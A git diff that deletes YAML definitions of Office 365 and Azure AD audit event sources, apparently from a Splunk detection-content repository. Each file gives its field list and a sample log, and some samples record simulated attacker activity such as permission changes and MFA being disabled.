-example_log: '{"CreationTime": "2024-02-01T16:07:34", "Id": "9cef02e9-4bfa-4c73-be7d-9dad68b9cea8", "Operation": "MailItemsAccessed", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 50, "ResultStatus": "Succeeded", "UserKey": "100320030DF47B14", "UserType": 0, "Version": 1, "Workload": "Exchange", "UserId": "user15@splunkresearch.onmicrosoft.com", "AppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientAppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientIPAddress": "120.1.121.35", "ClientInfoString": "Client=WebServices;ExchangeWebServicesProxy/CrossSite/EXCH/15.20.7249.024/python-requests/2.25.1[AppId=47629505-c2b6-4a80-adb1-9b3a3d233b7b];", "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxGuid": "7cfcc8fc-0d4a-4e1c-9592-dbb3de1e3859", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxOwnerUPN": "user15@splunkresearch.onmicrosoft.com", "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"}, {"Name": "IsThrottled", "Value": "False"}], "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB5530 (15.20.4200.000)\r\n", "Folders": [{"FolderItems": [{"InternetMessageId": "<CAFpGju6Zzs6HoCNQsDh0=F=vS7KHikisdRrnC_avRsZhqK2iXQ@mail.mail.com>", "SizeInBytes": 44329}, {"InternetMessageId": "<CAFpGju6MHeSA5yKSaPK4w+p1uYWmZ_zew8kF8200_=DtqkvipA@mail.mail.com>", "SizeInBytes": 44304}, {"InternetMessageId": "<CAFpGju7uUnyyuZmuc9rm593BsA6yeB+86GCDg5KzSE48TaAb4Q@mail.mail.com>", "SizeInBytes": 44572}, {"InternetMessageId": "<CH0PR18MB5530506D1B68B05A99A1109FF185A@CH0PR18MB5530.namprd18.prod.outlook.com>", "SizeInBytes": 245068}], "Id": "LgAAAAC0AxwgOj/BRq9Bs1bhMPw/AQDh+UNSDzeHSLWfq+fr83BDAAAAAAEMAAAB", "Path": "\\Inbox"}], "OperationCount": 4}'
diff --git a/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml b/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
deleted file mode 100644
index 6f4b11f4f0..0000000000
--- a/data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
+++ /dev/null
@@ -1,83 +0,0 @@
-event_name: O365 ModifyFolderPermissions
-fields:
-- _time
-- AppId
-- ClientIP
-- ClientIPAddress
-- ClientInfoString
-- CreationTime
-- ExternalAccess
-- Id
-- InternalLogonType
-- Item.Id
-- Item.ParentFolder.Id
-- Item.ParentFolder.MemberRights
-- Item.ParentFolder.MemberSid
-- Item.ParentFolder.MemberUpn
-- Item.ParentFolder.Name
-- Item.ParentFolder.Path
-- LogonType
-- LogonUserSid
-- MailboxGuid
-- MailboxOwnerSid
-- MailboxOwnerUPN
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- RecordType
-- ResultStatus
-- SessionId
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_service
-- change_type
-- client_info_str
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- eventtype
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- punct
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- tag
-- tag::eventtype
-- tenant_id
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-07T18:19:07", "Id": "ff065c17-e638-4013-20ab-08dbafceeca1", "Operation": "ModifyFolderPermissions", "OrganizationId": "e17879dd-24ec-44a6-be92-9dcbf6969220", "RecordType": 2, "ResultStatus": "Succeeded", "UserKey": "10032002CC029AE9", "UserType": 0, "Version": 1, "Workload": "Exchange", "ClientIP": "22.23.21.25", "UserId": "user1@contoso.onmicrosoft.com", "AppId": "00000002-0000-0ff1-ce00-000000000000", "ClientIPAddress": "22.23.21.25", "ClientInfoString": "Client=OWA;Action=ViaProxy", "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-45339891", "MailboxGuid": "8e942cc1-73d8-4483-9def-7d9579d615a7", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-45339891", "MailboxOwnerUPN": "user1@contoso.onmicrosoft.com", "OrganizationName": "contoso.onmicrosoft.com", "OriginatingServer": "BYAPR18MB2728 (15.20.4200.000)\r\n", "SessionId": "d2a5a3ba-992b-431a-9b52-8c76210d17d9", "Item": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB", "ParentFolder": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB", "MemberRights": "FreeBusySimple", "MemberSid": "S-1-1-0", "MemberUpn": "Everyone", "Name": "Inbox", "Path": "\\Inbox"}}}'
diff --git a/data_sources/cloud/event_sources/O365_Set-Mailbox.yml b/data_sources/cloud/event_sources/O365_Set-Mailbox.yml
deleted file mode 100644
index 59f8a227e1..0000000000
--- a/data_sources/cloud/event_sources/O365_Set-Mailbox.yml
+++ /dev/null
@@ -1,73 +0,0 @@
-event_name: O365 Set-Mailbox
-fields:
-- _time
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Identity
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- Params
-- RecordType
-- ResultStatus
-- SessionId
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- eventtype
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- punct
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- src_user_type
-- status
-- tag
-- tag::eventtype
-- tenant_id
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_account
-- vendor_product
-example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.192.200.190:52816", "CreationTime": "2020-12-16T12:32:28", "ExternalAccess": false, "Id": "a6a52406-0912-448d-36eb-08d8a1bea6be", "ObjectId": "bpatel", "Operation": "Set-Mailbox", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341 (15.20.3654.025)", "Parameters": [{"Name": "ForwardingAddress", "Value": ""}, {"Name": "Identity", "Value": "bpatel@rodsoto.onmicrosoft.com"}], "RecordType": 1, "ResultStatus": "True", "SessionId": "86a7cd7c-3f42-4b68-b670-4024b5461a80", "UserId": "pbareiss@rodsoto.onmicrosoft.com", "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/cloud/event_sources/O365_Set_Company_Information.yml b/data_sources/cloud/event_sources/O365_Set_Company_Information.yml
deleted file mode 100644
index ee428c5f9b..0000000000
--- a/data_sources/cloud/event_sources/O365_Set_Company_Information.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: O365 Set Company Information.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "bpatel@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "100320010208B5DC", "Type": 3}, {"ID": "User_425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2021-01-13T22:57:21", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "Company"}], "Id": "50a62783-f9d7-472c-9e44-f4f3d346e53c", "InterSystemsId": "6f435e84-e95b-44da-820f-2d2c9c237293", "IntraSystemId": "1163f0db-2241-4689-8486-b15c7812bbe0", "ModifiedProperties": [{"Name": "StrongAuthenticationPolicy", "NewValue": "[\r\n  {\r\n    \"RelyingPartyStrongAuthenticationPolicies\": [\r\n      {\r\n        \"RelyingParties\": [\r\n          \"*\"\r\n        ],\r\n        \"Rules\": [\r\n          {\r\n            \"SelectionConditions\": [\r\n              {\r\n                \"Claim\": 1,\r\n                \"Operator\": 0,\r\n                \"Values\": [\r\n                  \"73.15.72.101/32\",\r\n                  \"66.176.252.11/32\"\r\n                ]\r\n              }\r\n            ]\r\n          }\r\n        ],\r\n        \"Enabled\": true\r\n      }\r\n    ]\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"RelyingPartyStrongAuthenticationPolicies\": [\r\n      {\r\n        \"RelyingParties\": [\r\n          \"*\"\r\n        ],\r\n        \"Rules\": [\r\n          {\r\n            \"SelectionConditions\": [\r\n              {\r\n                \"Claim\": 1,\r\n                \"Operator\": 0,\r\n                \"Values\": [\r\n                  \"73.15.72.101/32\",\r\n                  \"66.176.252.11/32\"\r\n                ]\r\n              }\r\n            ]\r\n          },\r\n          {\r\n            \"SelectionConditions\": [\r\n              {\r\n                \"Claim\": 2,\r\n                \"Operator\": 0,\r\n                \"Values\": [\r\n                  \"insidecorporatenetwork--true\"\r\n                ]\r\n              }\r\n            ]\r\n          }\r\n        ],\r\n        \"Enabled\": true\r\n      }\r\n    ]\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationPolicy", "OldValue": ""}], "ObjectId": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Operation": "Set Company Information.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "Directory", "Type": 2}, {"ID": "Emergency Information Technology Services LLC", "Type": 1}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "bpatel@rodsoto.onmicrosoft.com", "UserKey": "100320010208B5DC@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_application.yml b/data_sources/cloud/event_sources/O365_Update_application.yml
deleted file mode 100644
index 999f3d2597..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_application.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Update application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-01T17:16:20", "Id": "c428c85c-4fa0-4e97-9033-6a76d9dee45d", "Operation": "Update application.", "OrganizationId": "58aee3b9-7433-46a0-b54e-2429487992a0", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name": "RequiredResourceAccess", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      },\r\n      {\r\n        \"EntitlementId\": \"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"b633e1c5-b582-4048-a93e-9f11b44c7e96\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "RequiredResourceAccess", "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "58aee3b9-7433-46a0-b54e-2429487992a0", "InterSystemsId": "6a0bc9d4-eb2d-4eb0-a524-601dac6914a6", "IntraSystemId": "a2d4d7c4-727c-401b-9e6c-70413a080855", "SupportTicketId": "", "Target": [{"ID": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "Application", "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 2}], "TargetContextId": "58aee3b9-7433-46a0-b54e-2429487992a0"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml b/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml
deleted file mode 100644
index eb5502b107..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml
+++ /dev/null
@@ -1,68 +0,0 @@
-event_name: O365 Update authorization policy.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-26T19:22:20", "Id": "83774e72-313f-4d1f-8609-7d0c7bb3b4ff", "Operation": "Update authorization policy.", "OrganizationId": "a417c578-c7ee-480d-a225-d48057e74df5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Swagger-Codegen/1.0.0.0/csharp/msal\"}"}, {"Name": "extendedAuditEventCategory", "Value": "AuthorizationPolicy"}], "ModifiedProperties": [{"Name": "AllowUserConsentForRiskyApps", "NewValue": "[\r\n  true\r\n]", "OldValue": "[\r\n  false\r\n]"}, {"Name": "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "NewValue": "[\r\n  \"microsoft-user-default-legacy\"\r\n]", "OldValue": "[\r\n  \"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole", "OldValue": ""}], "Actor": [{"ID": "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "a417c578-c7ee-480d-a225-d48057e74df5", "InterSystemsId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "IntraSystemId": "92a0d051-2d0d-4608-9d09-6fca619764a2", "SupportTicketId": "", "Target": [{"ID": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "Other", "Type": 2}, {"ID": "Authorization Policy", "Type": 1}], "TargetContextId": "a417c578-c7ee-480d-a225-d48057e74df5"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_user.yml b/data_sources/cloud/event_sources/O365_Update_user.yml
deleted file mode 100644
index 0242d8933f..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_user.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: O365 Update user.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-20T19:32:59", "Id": "d06df1c6-b3f2-4595-90b9-99b8f91811c3", "Operation": "Update user.", "OrganizationId": "99825d50-9544-4061-8e46-68923805cbf2", "RecordType": 8, "ResultStatus": "Success", "UserKey": "10032002CC029AE9@splunkresearch1.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victim@splunkresearch1.onmicrosoft.com", "UserId": "victim@splunkresearch1.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties": [{"Name": "StrongAuthenticationMethod", "NewValue": "[\r\n  {\r\n    \"MethodType\": 7,\r\n    \"Default\": false\r\n  },\r\n  {\r\n    \"MethodType\": 6,\r\n    \"Default\": true\r\n  },\r\n  {\r\n    \"MethodType\": 0,\r\n    \"Default\": false\r\n  },\r\n  {\r\n    \"MethodType\": 5,\r\n    \"Default\": false\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"MethodType\": 6,\r\n    \"Default\": true\r\n  },\r\n  {\r\n    \"MethodType\": 7,\r\n    \"Default\": false\r\n  }\r\n]"}, {"Name": "StrongAuthenticationRequirement", "NewValue": "[\r\n  {\r\n    \"RelyingParty\": \"*\",\r\n    \"State\": 0,\r\n    \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"RelyingParty\": \"*\",\r\n    \"State\": 1,\r\n    \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationMethod, StrongAuthenticationRequirement", "OldValue": ""}, {"Name": "TargetId.UserType", "NewValue": "Member", "OldValue": ""}], "Actor": [{"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}, {"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "99825d50-9544-4061-8e46-68923805cbf2", "InterSystemsId": "533a45c6-4f9a-4527-ad8d-e8fec5c7d8e4", "IntraSystemId": "32734207-053e-4ad1-87a3-4da1dfa69c58", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "99825d50-9544-4061-8e46-68923805cbf2"}'
diff --git a/data_sources/cloud/event_sources/O365_UserLoggedIn.yml b/data_sources/cloud/event_sources/O365_UserLoggedIn.yml
deleted file mode 100644
index 3884ec04a8..0000000000
--- a/data_sources/cloud/event_sources/O365_UserLoggedIn.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: O365 UserLoggedIn
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- ApplicationId
-- AzureActiveDirectoryEventType
-- BrowserType
-- ClientIP
-- CreationTime
-- DeviceProperties{}.Name
-- DeviceProperties{}.Value
-- ErrorNumber
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- OS
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- RequestType
-- ResultStatus
-- ResultStatusDetail
-- SessionId
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserAgent
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-12-04T20:42:05", "Id": "52d72a62-132b-487b-bb7f-c4c119f90700", "Operation": "UserLoggedIn", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 15, "ResultStatus": "Success", "UserKey": "2d2f9e2c-8350-4d98-852e-3f06daaf7185", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "54.68.231.63", "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "UserId": "user15@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}], "ModifiedProperties": [], "Actor": [{"ID": "2d2f9e2c-8350-4d98-852e-3f06daaf7185", "Type": 0}, {"ID": "user15@splunkresearch.onmicrosoft.com", "Type": 5}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ActorIpAddress": "54.68.231.63", "InterSystemsId": "6463a6ad-27ec-b311-dc52-ecdde38d9492", "IntraSystemId": "52d72a62-132b-487b-bb7f-c4c119f90700", "SupportTicketId": "", "Target": [{"ID": "00000002-0000-0ff1-ce00-000000000000", "Type": 0}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "DeviceProperties": [{"Name": "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Firefox"}, {"Name": "SessionId", "Value": "15e27956-79a0-45b2-9d02-60f48349f692"}], "ErrorNumber": "0"}'
diff --git a/data_sources/cloud/event_sources/O365_UserLoginFailed.yml b/data_sources/cloud/event_sources/O365_UserLoginFailed.yml
deleted file mode 100644
index cdbb6a8262..0000000000
--- a/data_sources/cloud/event_sources/O365_UserLoginFailed.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: O365 UserLoginFailed
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- ApplicationId
-- AzureActiveDirectoryEventType
-- BrowserType
-- ClientIP
-- CreationTime
-- DeviceProperties{}.Name
-- DeviceProperties{}.Value
-- ErrorNumber
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- IsCompliantAndManaged
-- LogonError
-- OS
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- RequestType
-- ResultStatus
-- ResultStatusDetail
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserAgent
-- UserAuthenticationMethod
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_method
-- authentication_service
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- host
-- index
-- linecount
-- object
-- punct
-- reason
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- tag
-- tag::action
-- tag::eventtype
-- user
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
